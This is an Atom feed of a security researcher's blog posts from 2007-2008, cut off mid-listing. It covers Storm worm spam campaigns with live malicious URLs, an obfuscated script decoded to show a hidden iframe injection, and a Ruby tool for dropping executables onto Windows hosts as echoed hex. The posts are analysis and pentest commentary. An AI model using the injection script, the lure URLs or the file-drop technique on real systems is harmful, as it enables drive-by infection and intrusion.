<?xml version='1.0' encoding='UTF-8'?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/'><id>tag:blogger.com,1999:blog-12227024</id><updated>2008-06-17T17:21:30.035-04:00</updated><title type='text'>John H. Sawyer</title><link rel='alternate' type='text/html' href='http://www.johnhsawyer.com/'/><link rel='next' type='application/atom+xml' href='http://www.blogger.com/feeds/12227024/posts/default?start-index=26&amp;max-results=25'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/12227024/posts/default'/><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://www.johnhsawyer.com/atom.xml'/><author><name>John H. Sawyer</name><uri>http://www.blogger.com/profile/07459314688135865938</uri><email>noreply@blogger.com</email></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>82</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-12227024.post-291984902407907129</id><published>2008-05-20T02:02:00.005-04:00</published><updated>2008-05-20T02:25:24.500-04:00</updated><title type='text'>exe2hex.rb: old school pwnage</title><content type='html'>I figured I'd better put this up before I keep having more ideas of how to improve it and never end up posting it.&lt;br /&gt;&lt;br /&gt;What is it? Just over a month ago, a buddy (who's recently begun working for a BIG company that just happens to do some pentesting) was telling me about a pentest where they weren't allowed to upload software so he had to write something in a batch file. While we were chatting, I began telling him of the different ways I've seen attackers put files on Windows systems: tftp, ftp (with &amp; without scripts), wget-like VBscript and echo.&lt;br /&gt;&lt;br /&gt;While echo was integral in most of the above techniques (ftp script &amp; VBscript), I'd seen a handful of hacks back in 2005 where an attacker used echo and pasted hex into a file. When the file was complete, he ran "debug &lt; 123.hex". Renamed the resulting file to end with ".exe" and his tool was complete.&lt;br /&gt;&lt;br /&gt;After digging through some really old incidents I'd investigated, I found some real world examples of the technique used during compromises. A little bit of Google-ing revealed these two links to a &lt;a href="http://www.governmentsecurity.org/archive/t7255.html"&gt;forum post&lt;/a&gt; describing the technique in 2004 and mention in a &lt;a href="http://www.phrack.org/issues.html?id=7&amp;issue=62"&gt;Phrack article&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;After sitting in on part of Ed Skoudis' new Security 560 Penetration Testing class, I saw that his class didn't mention this technique but it covered just about all the others above. Since I would one day like to be efficient at writing ruby, I wrote &lt;a href="http://www.johnhsawyer.com/files/exe2hex.rb "&gt;exe2hex.rb&lt;/a&gt; based on the C code from &lt;a href="http://www.g615.co.uk/riftor/exe2hex.c"&gt;Riftor&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Currently, due to a limitation in Microsoft's debug.exe, files must be smaller than 65,280 bytes. My next version will automatically split up files to be under the correct size and convert each one to hex. Once echo'd and converted on the target host, the individual files can be joined with "copy file1+file2+file3 /b dest /b" (or at least it should work that way...need to do more testing).&lt;br /&gt;&lt;br /&gt;Where does this tool come in handy...I have some ideas but they'll have to wait. I need to pack things up here in the lab and head home.</content><link rel='alternate' type='text/html' href='http://www.johnhsawyer.com/2008/05/exe2hexrb-old-school-pwnage.html' title='exe2hex.rb: old school pwnage'/><link rel='related' href='http://www.johnhsawyer.com/files/exe2hex.rb' title='exe2hex.rb: old school pwnage'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=12227024&amp;postID=291984902407907129' title='0 Comments'/><link rel='replies' type='application/atom+xml' href='http://www.johnhsawyer.com/atom.xml' title='Post Comments'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/12227024/posts/default/291984902407907129'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/12227024/posts/default/291984902407907129'/><author><name>John H. Sawyer</name><uri>http://www.blogger.com/profile/07459314688135865938</uri><email>noreply@blogger.com</email></author></entry><entry><id>tag:blogger.com,1999:blog-12227024.post-342924846348718566</id><published>2008-01-15T14:01:00.000-05:00</published><updated>2008-01-15T15:12:36.312-05:00</updated><title type='text'>Storm &lt;3's You!</title><content type='html'>Storm (Nuwar, CME711, etc) just reminded me that Valentine's is less than a month away. I've gotten four &lt;a href="http://www.sophos.com/security/analyses/w32drefah.html"&gt;recycled e-mails&lt;/a&gt; looking to spread some love. When I first got the copies, only two AV vendors (NOD32v2 &amp; Webwasher-Gateway) on VirusTotal.com were detecting it as malicious.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Subject:&lt;/b&gt; Our Love is Free&lt;br /&gt;&lt;b&gt;Body:&lt;/b&gt; When Love Comes Knocking http://69.212.48.3/&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Subject:&lt;/b&gt; I Love Thee&lt;br /&gt;&lt;b&gt;Body:&lt;/b&gt; Words in my Heart http://24.1.116.187/&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Subject:&lt;/b&gt; A Is For Attitude&lt;br /&gt;&lt;b&gt;Body:&lt;/b&gt; A Dream is a Wish http://222.107.37.211/&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Subject:&lt;/b&gt; Eternity of Your Love&lt;br /&gt;&lt;b&gt;Body:&lt;/b&gt; The Moon &amp; Stars http://68.57.210.178/&lt;br /&gt;&lt;br /&gt;The webpage contains some URL encoded text that links to "with_love.exe"&lt;br /&gt;&lt;br /&gt;'%3C%61%20%68%72%65%66%3D%22%77%69%74%68%6C%6F%76%65%2E%65%78%65%22%3E%0D%0A'&lt;br /&gt;&lt;br /&gt;&lt;img src="http://www.johnhsawyer.com/images/StormLove.png" border="0"&gt;</content><link rel='alternate' type='text/html' href='http://www.johnhsawyer.com/2008/01/storm-3s-you.html' title='Storm &lt;3&apos;s You!'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=12227024&amp;postID=342924846348718566' title='0 Comments'/><link rel='replies' type='application/atom+xml' href='http://www.johnhsawyer.com/atom.xml' title='Post Comments'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/12227024/posts/default/342924846348718566'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/12227024/posts/default/342924846348718566'/><author><name>John H. Sawyer</name><uri>http://www.blogger.com/profile/07459314688135865938</uri><email>noreply@blogger.com</email></author></entry><entry><id>tag:blogger.com,1999:blog-12227024.post-2467881853105976887</id><published>2007-11-04T17:44:00.000-05:00</published><updated>2007-11-04T17:54:35.815-05:00</updated><title type='text'>Tethering a Verizon BlackBerry 8830 with Mac OS X Leopard</title><content type='html'>These settings go into System Preferences under the Network area. You have to add a Bluetooth device and pair the phone with modem. If you don't know how, read the &lt;a href="http://www.blackberryforums.com/mac-users-corner/86122-how-tether-your-mac-blackberry-8830-a.html"&gt;forum post&lt;/a&gt; that got me this far. The forum works great with Tiger but did not work with Leopard. I had to make changes to the Advanced area to get it to work properly.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Username:&lt;/span&gt; &lt;span style="font-style:italic;"&gt;PHONE_NUMBER@vzw3.com&lt;/span&gt; (not sure how important this is, I've done it with the BlackBerry Internet Server username also)&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Password:&lt;/span&gt; &lt;span style="font-style:italic;"&gt;vzw&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Telephone:&lt;/span&gt;&lt;span style="font-style:italic;"&gt; #777&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Advanced button&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Vendor:&lt;/span&gt; &lt;span style="font-style:italic;"&gt;Generic&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Model:&lt;/span&gt; &lt;span style="font-style:italic;"&gt;Dialup Device&lt;/span&gt;&lt;br /&gt;(Leave the rest as defaults)</content><link rel='alternate' type='text/html' href='http://www.johnhsawyer.com/2007/11/tethering-verizon-blackberry-8830-with.html' title='Tethering a Verizon BlackBerry 8830 with Mac OS X Leopard'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=12227024&amp;postID=2467881853105976887' title='2 Comments'/><link rel='replies' type='application/atom+xml' href='http://www.johnhsawyer.com/atom.xml' title='Post Comments'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/12227024/posts/default/2467881853105976887'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/12227024/posts/default/2467881853105976887'/><author><name>John H. Sawyer</name><uri>http://www.blogger.com/profile/07459314688135865938</uri><email>noreply@blogger.com</email></author></entry><entry><id>tag:blogger.com,1999:blog-12227024.post-4582431196692365056</id><published>2007-11-02T15:50:00.000-04:00</published><updated>2007-11-02T16:28:29.286-04:00</updated><title type='text'>Ruby snippet for URI decoding</title><content type='html'>&lt;a href="http://www.ruby-doc.org/stdlib/libdoc/uri/rdoc/classes/URI/Escape.html"&gt;Ruby Module URI::Escape&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;I was doing some quick analysis of a page that had some obfuscated javascript with some URI encoded text. Usually, I pull out the javascript and run it through SpiderMonkey (or Didier Stephen's modified version) to see what's going on. Recently, Jordan and I were talking about CLI tools for doing encoding/decoding of things in hex, URI, binary and similar.&lt;br /&gt;&lt;br /&gt;So, I took this opportunity to figure out the Ruby for deobfuscating something like this:&lt;br /&gt;&lt;blockquote&gt;eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e&lt;br /&gt;%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66&lt;br /&gt;%72%61%6d%65%20%6e%61%6d%65%3d%39%61%37%62%34%37%32%32%20%73%72%63&lt;br /&gt;%3d%5c%27%68%74%74%70%3a%2f%2f%69%6c%6f%76%65%6d%79%6c%6f%76%65%73&lt;br /&gt;%2e%63%6f%6d%2f%74%72%61%66%66%2e%70%68%70%3f%27%2b%4d%61%74%68%2e&lt;br /&gt;%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%35&lt;br /&gt;%32%37%36%29%2b%27%37%61%33%62%36%38%30%39%66%38%5c%27%20%77%69%64&lt;br /&gt;%74%68%3d%32%30%31%20%68%65%69%67%68%74%3d%37%36%20%73%74%79%6c%65&lt;br /&gt;%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69&lt;br /&gt;%66%72%61%6d%65%3e%27%29"));&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;Which this:&lt;br /&gt;&lt;blockquote&gt;ruby -e 'require "uri"; p URI.unescape("&amp;ltjunk_from_above&amp;gt")'&lt;/blockquote&gt;&lt;br /&gt;Returns this:&lt;br /&gt;&lt;blockquote&gt;"window.status='Done';document.write('&amp;ltiframe name=9a7b4722 src=\\'http://ilovemyloves.com/traff.php?'+Math.round(Math.random()*15276)+'7a3b6809f8\\' width=201 height=76 style=\\'display: none\\'&amp;gt&amp;lt/iframe&amp;gt')"&lt;/blockquote&gt;</content><link rel='alternate' type='text/html' href='http://www.johnhsawyer.com/2007/11/ruby-snippet-for-uri-decoding.html' title='Ruby snippet for URI decoding'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=12227024&amp;postID=4582431196692365056' title='2 Comments'/><link rel='replies' type='application/atom+xml' href='http://www.johnhsawyer.com/atom.xml' title='Post Comments'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/12227024/posts/default/4582431196692365056'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/12227024/posts/default/4582431196692365056'/><author><name>John H. Sawyer</name><uri>http://www.blogger.com/profile/07459314688135865938</uri><email>noreply@blogger.com</email></author></entry><entry><id>tag:blogger.com,1999:blog-12227024.post-1734803404365064646</id><published>2007-10-24T23:53:00.000-04:00</published><updated>2007-10-24T23:55:57.739-04:00</updated><title type='text'>VMware Server 1.0.4 on Ubuntu Server 7.10 (Gutsy Gibbon)</title><content type='html'>Note to self:&lt;br /&gt;&lt;span style="font-style:italic;"&gt;sudo apt-get install libxrender1 libxt6 libxtst6 libx11-6 build-essential xinetd linux-headers-2.6.22-14-server&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;I've heard VMware is available from one of the repositories, but I've not tried it. This is for installs from the downloaded tarball.</content><link rel='alternate' type='text/html' href='http://www.johnhsawyer.com/2007/10/vmware-server-104-on-ubuntu-server-710.html' title='VMware Server 1.0.4 on Ubuntu Server 7.10 (Gutsy Gibbon)'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=12227024&amp;postID=1734803404365064646' title='0 Comments'/><link rel='replies' type='application/atom+xml' href='http://www.johnhsawyer.com/atom.xml' title='Post Comments'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/12227024/posts/default/1734803404365064646'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/12227024/posts/default/1734803404365064646'/><author><name>John H. Sawyer</name><uri>http://www.blogger.com/profile/07459314688135865938</uri><email>noreply@blogger.com</email></author></entry><entry><id>tag:blogger.com,1999:blog-12227024.post-1320681068774423339</id><published>2007-10-18T09:58:00.000-04:00</published><updated>2007-10-18T21:56:02.417-04:00</updated><title type='text'>Play that funky mus...stock spam, Storm</title><content type='html'>Storm has been sending out pump and dump spam for quite a while with everything from plain text to images to zips. Now, it's throwing MP3's at us. Here are two files below. So far, the subjects have been blank with "Re:" or "Fwd:".&lt;br /&gt;&lt;br /&gt;Of note, the X-Mailer is "Microsoft Outlook Express 6.00.2800.1106" but that varies with each new iteration of storm. I've seen it claim to be Thunderbird in the past.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;&lt;a href="http://www.johnhsawyer.com/files/coolringtone.mp3"&gt;coolringtone.mp3&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.johnhsawyer.com/files/coolringtone.mp3"&gt;firstdance.mp3&lt;/a&gt;&lt;/span&gt;</content><link rel='alternate' type='text/html' href='http://www.johnhsawyer.com/2007/10/play-that-funky-musstock-spam-storm.html' title='Play that funky mus...stock spam, Storm'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=12227024&amp;postID=1320681068774423339' title='0 Comments'/><link rel='replies' type='application/atom+xml' href='http://www.johnhsawyer.com/atom.xml' title='Post Comments'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/12227024/posts/default/1320681068774423339'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/12227024/posts/default/1320681068774423339'/><author><name>John H. Sawyer</name><uri>http://www.blogger.com/profile/07459314688135865938</uri><email>noreply@blogger.com</email></author></entry><entry><id>tag:blogger.com,1999:blog-12227024.post-6556887050539479966</id><published>2007-10-17T13:50:00.000-04:00</published><updated>2007-10-17T21:28:39.114-04:00</updated><title type='text'>Because there is no patch...</title><content type='html'>...for human stupidity. Which is why Storm keeps spreading. There is simply no excuse for people to continue infecting themselves. I'd take a stab and antivirus companies but they simply can't keep up. Until they all move to true behavioral-based detection, they won't be able to handle the flood of malware coming from the miscreants out there.&lt;br /&gt;&lt;br /&gt;Today, Storm worm brings us a new attempt to infect people by getting them to believe that there's a new filesharing application called Krackin. Great!&lt;br /&gt;&lt;br /&gt;Below are samples of the e-mails, screenshots and the javascript exploits.&lt;br /&gt;&lt;blockquote&gt;&lt;br /&gt;&lt;b&gt;Subject:&lt;/b&gt;re: krackin is released&lt;br /&gt;&lt;b&gt;Body:&lt;/b&gt;New Sharing network goes live. Check out Krackin here.&lt;br /&gt;http://xx.90.44.73/&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;br /&gt;&lt;b&gt;Subject:&lt;/b&gt;re: krackin is online&lt;br /&gt;&lt;b&gt;Body:&lt;/b&gt;Ok, last time I am sending you this linkman. LOL write it down or&lt;br /&gt;soothing. This is krackin. http://xx.74.85.128/&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;br /&gt;&lt;b&gt;Subject:&lt;/b&gt;man here is the link&lt;br /&gt;&lt;b&gt;Body:&lt;/b&gt;man here is the next huge sharing network. It is friggin awesome. Check&lt;br /&gt;it out. http://xx.37.24.109/&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;a href="http://www.johnhsawyer.com/files/storm-krackin.png"&gt;&lt;img src="http://www.johnhsawyer.com/files/storm-krackin.png" border="0" width="500"&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Here's a &lt;a href="http://www.johnhsawyer.com/files/storm-krackin-js.txt" target="new"&gt;text file&lt;/a&gt; of the javascript exploit code. Handle with care!</content><link rel='alternate' type='text/html' href='http://www.johnhsawyer.com/2007/10/because-there-is-no-patch.html' title='Because there is no patch...'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=12227024&amp;postID=6556887050539479966' title='1 Comments'/><link rel='replies' type='application/atom+xml' href='http://www.johnhsawyer.com/atom.xml' title='Post Comments'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/12227024/posts/default/6556887050539479966'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/12227024/posts/default/6556887050539479966'/><author><name>John H. Sawyer</name><uri>http://www.blogger.com/profile/07459314688135865938</uri><email>noreply@blogger.com</email></author></entry><entry><id>tag:blogger.com,1999:blog-12227024.post-8047540017168414319</id><published>2007-10-11T22:12:00.000-04:00</published><updated>2007-10-11T23:43:57.983-04:00</updated><title type='text'>Kitties say Storm is better than catnip!</title><content type='html'>Just when I think there's nothing new going on with Storm, in flies a few new e-mails. This time it has similar content as before, but with the hook being a cute, crazy kitty cat.&lt;br /&gt;&lt;blockquote&gt;&lt;br /&gt;&lt;b&gt;Subject:&lt;/b&gt; You have just received an ecard.&lt;br /&gt;&lt;b&gt;Body:&lt;/b&gt; Check out the original Crazy Cat Card. It is too funny for words.&lt;br /&gt;http://75.4.70.217/&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;br /&gt;&lt;b&gt;Subject:&lt;/b&gt; Check out your ecard.&lt;br /&gt;&lt;b&gt;Body:&lt;/b&gt; Click here to view your laughing kitty card online. http://74.138.11.91/&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;br /&gt;&lt;b&gt;Subject:&lt;/b&gt; You've got a greeting just for you!&lt;br /&gt;&lt;b&gt;Body:&lt;/b&gt; Please click here to view your Crazy Kitty Card Online.&lt;br /&gt;http://99.162.220.182/&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;Here's a screenshot of the page:&lt;br /&gt;&lt;a href="http://www.johnhsawyer.com/files/superlaugh.png"&gt;&lt;img src="http://www.johnhsawyer.com/files/superlaugh.png" border="0" width="400"&gt;&lt;/a&gt;&lt;br /&gt;After looking at the source and downloading the Flash animation (the cat), I used Flare to extract any scripts. I found the the original file came from http://www.superlaugh.com/1/catnip.swf Both files were the same size but MD5's did not match.&lt;br /&gt;&lt;blockquote&gt;&lt;br /&gt;movie 'catnip.swf' {&lt;br /&gt;// flash 4, total frames: 127, frame rate: 12 fps, 360x450 px&lt;br /&gt;  frame 1 {&lt;br /&gt;    ifFrameLoaded (4) {&lt;br /&gt;      gotoAndPlay(3);&lt;br /&gt;    }&lt;br /&gt;  }&lt;br /&gt;  frame 2 {&lt;br /&gt;    gotoAndPlay(1);&lt;br /&gt;  }&lt;br /&gt;  movieClip 5  {&lt;br /&gt;  }&lt;br /&gt;  button 7 {&lt;br /&gt;    on (release) {&lt;br /&gt;      getURL('http://www.superlaugh.com', '_top');&lt;br /&gt;    }&lt;br /&gt;  }&lt;br /&gt;  movieClip 14  {&lt;br /&gt;  }&lt;br /&gt;  frame 125 {&lt;br /&gt;    gotoAndPlay(3);&lt;br /&gt;  }&lt;br /&gt;}&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;The links on the page all go to SuperLaugh.exe which was caught by 70% of scan engines on Virus Total. &lt;a href="http://www.johnhsawyer.com/files/superlaugh.txt"&gt;Obfuscated Javascript was found&lt;/a&gt; at the bottom just like some previous versions. It looked to be the same exploits that have been being used on and off since I first started looking into Storm about a month or two ago.&lt;br /&gt;&lt;br /&gt;Also, all the images, including the kitty Flash file, were sourced from the "/img" directory but it did not allow browsing of directories.&lt;br /&gt;&lt;img src="http://www.johnhsawyer.com/files/superlaugh404.png" border="0"&gt;</content><link rel='alternate' type='text/html' href='http://www.johnhsawyer.com/2007/10/kitties-say-storm-is-better-than-catnip.html' title='Kitties say Storm is better than catnip!'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=12227024&amp;postID=8047540017168414319' title='0 Comments'/><link rel='replies' type='application/atom+xml' href='http://www.johnhsawyer.com/atom.xml' title='Post Comments'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/12227024/posts/default/8047540017168414319'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/12227024/posts/default/8047540017168414319'/><author><name>John H. Sawyer</name><uri>http://www.blogger.com/profile/07459314688135865938</uri><email>noreply@blogger.com</email></author></entry><entry><id>tag:blogger.com,1999:blog-12227024.post-289363277620531568</id><published>2007-09-25T22:20:00.000-04:00</published><updated>2007-09-25T22:41:21.781-04:00</updated><title type='text'>Links for AITP and FAEDS presentations</title><content type='html'>Thank all of you for attending my presentation. If you have any questions, please don't hesitate to e-mail me. Here are links to many of the things I talked about and demonstrated along with several that I didn't have time to get to.&lt;br /&gt;&lt;br /&gt;My Websites&lt;br /&gt;-----------------------------------&lt;br /&gt;Personal Blog&lt;br /&gt;http://www.johnhsawyer.com&lt;br /&gt;&lt;br /&gt;Dark Reading Blog&lt;br /&gt;http://www.darkreading.com/blog.asp?blog_sectionid=447&lt;br /&gt;&lt;br /&gt;UF IT Security Team&lt;br /&gt;http://infosec.ufl.edu&lt;br /&gt;&lt;br /&gt;Malware Analysis and Sandboxes&lt;br /&gt;-----------------------------------&lt;br /&gt;VirusTotal (submit files for analysis)&lt;br /&gt;http://www.virustotal.com/&lt;br /&gt;&lt;br /&gt;CWSandbox - Behavior-based Malware Analysis&lt;br /&gt;http://www.cwsandbox.org/&lt;br /&gt;&lt;br /&gt;Anubis: Analyzing Unknown Binaries&lt;br /&gt;http://analysis.seclab.tuwien.ac.at/index.php&lt;br /&gt;&lt;br /&gt;Norman Sandbox&lt;br /&gt;http://www.norman.com/microsites/nsic/Submit/en&lt;br /&gt;&lt;br /&gt;Mandiant Red Curtain&lt;br /&gt;http://www.mandiant.com/mrc&lt;br /&gt;&lt;br /&gt;PEiD&lt;br /&gt;http://www.secretashell.com/codomain/peid/&lt;br /&gt;&lt;br /&gt;pefile (for you Python programmers)&lt;br /&gt;http://dkbza.org/pefile.html&lt;br /&gt;&lt;br /&gt;Firefox Extensions and SpiderMonkey&lt;br /&gt;-----------------------------------&lt;br /&gt;NoScript&lt;br /&gt;http://noscript.net/&lt;br /&gt;&lt;br /&gt;User Agent Switcher&lt;br /&gt;http://chrispederick.com/work/web-developer/&lt;br /&gt;&lt;br /&gt;WebDeveloper&lt;br /&gt;http://chrispederick.com/work/web-developer/&lt;br /&gt;&lt;br /&gt;SpiderMonkey&lt;br /&gt;http://www.mozilla.org/js/spidermonkey/&lt;br /&gt;&lt;br /&gt;Incident Response Tools (&amp; more)&lt;br /&gt;-----------------------------------&lt;br /&gt;Sysinternals&lt;br /&gt;http://www.microsoft.com/technet/sysinternals/default.mspx&lt;br /&gt; (autoruns, tcpview, filemon, regmon, process moniopenports, tor, process explorer, pstools)&lt;br /&gt; Sysinternals Suite (all tools in one download)&lt;br /&gt; http://www.microsoft.com/technet/sysinternals/Utilities/SysinternalsSuite.mspx&lt;br /&gt;&lt;br /&gt;DiamondCS&lt;br /&gt;http://www.diamondcs.com.au/consoletools.php&lt;br /&gt; (cmdline, openports)&lt;br /&gt;&lt;br /&gt;Wireshark - sniffer and protocol analzer (formerly Ethereal)&lt;br /&gt;http://www.wireshark.org&lt;br /&gt;&lt;br /&gt;Helix - CD designed for incident response and forensics (Linux &amp; Windows tools)&lt;br /&gt;http://www.e-fense.com/helix/&lt;br /&gt;&lt;br /&gt;Some Security Blogs&lt;br /&gt;-----------------------------------&lt;br /&gt;SANS Internet Storm Center&lt;br /&gt;http://isc.sans.org&lt;br /&gt;&lt;br /&gt;Windows Incident Response (Harlan Carvey) - event logs, registry and memory analysis &amp; more&lt;br /&gt;http://windowsir.blogspot.com/&lt;br /&gt;&lt;br /&gt;int for(ensic){blog;} (Andreas Schuster) - event logs and memory analysis &lt;br /&gt;http://computer.forensikblog.de/en/&lt;br /&gt;&lt;br /&gt;Centralizing Windows Event Logs&lt;br /&gt;-----------------------------------&lt;br /&gt;Series of Posts on DarkReading about logs:&lt;br /&gt; Log Central&lt;br /&gt; http://www.darkreading.com/blog.asp?blog_sectionid=447&amp;doc_id=132446&lt;br /&gt; How to Centralize Windows Event Logs (links to Snare and Lasso)&lt;br /&gt; http://www.darkreading.com/blog.asp?blog_sectionid=447&amp;doc_id=132709&lt;br /&gt; Watch Out for That Log!&lt;br /&gt; http://www.darkreading.com/blog.asp?blog_sectionid=447&amp;doc_id=133005&lt;br /&gt; &lt;br /&gt;Miscellaneous Links&lt;br /&gt;-----------------------------------&lt;br /&gt;Metasploit Framework&lt;br /&gt;http://framework.metasploit.com/&lt;br /&gt;&lt;br /&gt;VMware (Workstation for Linux &amp; Windows, Fusion for Mac, Server and Player are FREE &lt;not ESX&gt;)&lt;br /&gt;http://www.vmware.com</content><link rel='alternate' type='text/html' href='http://www.johnhsawyer.com/2007/09/links-for-aitp-and-faeds-presentations.html' title='Links for AITP and FAEDS presentations'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=12227024&amp;postID=289363277620531568' title='0 Comments'/><link rel='replies' type='application/atom+xml' href='http://www.johnhsawyer.com/atom.xml' title='Post Comments'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/12227024/posts/default/289363277620531568'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/12227024/posts/default/289363277620531568'/><author><name>John H. Sawyer</name><uri>http://www.blogger.com/profile/07459314688135865938</uri><email>noreply@blogger.com</email></author></entry><entry><id>tag:blogger.com,1999:blog-12227024.post-8238982151356190852</id><published>2007-09-20T16:54:00.000-04:00</published><updated>2007-09-20T17:01:42.222-04:00</updated><title type='text'>Process memory dumping tools</title><content type='html'>This is from a post I had over at ForenisFocus.com. I'm working on a presentation and was trying to come up with a list of all the useful process dumpers for Windows, so I did a little Googling and found my old post. So, I stuck it here for my own future reference.&lt;br /&gt;&lt;hr&gt;&lt;br /&gt;Everyone already knows about &lt;a href="http://users.erols.com/gmgarner/forensics/" target="_blank" title="http://users.erols.com/gmgarner/forensics/" class="postlink" rel="nofollow"&gt;dd for Windows from George M. Garner&lt;/a&gt; so I won't discuss it any further. Until, the tools like those developed in the 2005 DFRWS memory forensic challenge are released, dd memory images are only as useful as the strings you pull out of them.&lt;br /&gt;&lt;br /&gt;There is some promising research from Mariusz Burdach who just spoke at BlackHat Federal 2006 on "Finding Digital Evidence in Physical Memory." His website is located at &lt;a href="http://forensic.seccure.net/" target="_blank" title="http://forensic.seccure.net/" class="postlink" rel="nofollow"&gt;http://forensic.seccure.net/&lt;/a&gt; but his documentation memory forensics is more up-to-date on the &lt;a href="http://www.blackhat.com/html/bh-media-archives/bh-archives-2006.html#federal" target="_blank" title="http://www.blackhat.com/html/bh-media-archives/bh-archives-2006.html#federal" class="postlink" rel="nofollow"&gt;BlackHat Media Archives page&lt;/a&gt;. The tools/docs archive even has the Windows version of wmft.exe which isn't on his webpage yet (just the linux version of wmft is there).&lt;br /&gt;&lt;br /&gt;Memdump was mentioned but there are at least two different versions for Windows that I know of. The one mentioned previously by APsoft and another from the Metasploit project.&lt;br /&gt;&lt;blockquote&gt;&lt;br /&gt;&lt;a href="http://www.tssc.de" target="_blank" title="http://www.tssc.de" class="postlink" rel="nofollow"&gt;APsoft's&lt;/a&gt; memdump will do any or all of memory.&lt;br /&gt;&lt;table width="90%" cellspacing="1" cellpadding="3" border="0" align="center"&gt;&lt;br /&gt; &lt;td class="code"&gt;&lt;code&gt;&lt;pre&gt;MEMDUMP/386 for DOS Version 2.00 - Release 15-Jun-2005&lt;br /&gt;&amp;#40;C&amp;#41; Copyright 1993-2005 by APSoft &amp;#40;http&amp;#58;//www.tssc.de&amp;#41;&lt;br /&gt;All rights reserved.  Disassembly or decompilation prohibited.&lt;br /&gt;&lt;br /&gt;This program dumps or copy any part of 4GB memory address space of your system.&lt;br /&gt;For proper access to hardware registers, memory can be read with BYTE, WORD or&lt;br /&gt;Double WORD granularity.&lt;br /&gt;&lt;br /&gt;Syntax&amp;#58; MEMDUMP &amp;#91;/H|?&amp;#93;&lt;br /&gt;                &amp;#91;/D&amp;#91;B|W|D&amp;#93;&amp;#91;&amp;#58;Address&amp;#91;,Length&amp;#93;&amp;#93;&amp;#93;&lt;br /&gt;                &amp;#91;/F&amp;#58;filename|none&amp;#93;&lt;br /&gt;                &amp;#91;/B&amp;#58;filename&amp;#93;&lt;br /&gt;&lt;br /&gt; where&amp;#58; /H              - Print this text&lt;br /&gt;        /D&amp;#91;B|W|D&amp;#93;&amp;#91;&amp;#58;Address&amp;#91;,Length&amp;#93;&amp;#93;&lt;br /&gt;                        - Dump &amp;lt;Length&amp;gt; number of memory bytes from specified&lt;br /&gt;                          linear &amp;lt;Address&amp;gt; as bytes &amp;#40;DB&amp;#41;, words &amp;#40;DW&amp;#41; or&lt;br /&gt;                          double words &amp;#40;DD&amp;#41; correspondingly.&lt;br /&gt;        /F&amp;#58;filename     - Output file for the dump &amp;#40;Default&amp;#58; console&amp;#41;&lt;br /&gt;                          Use 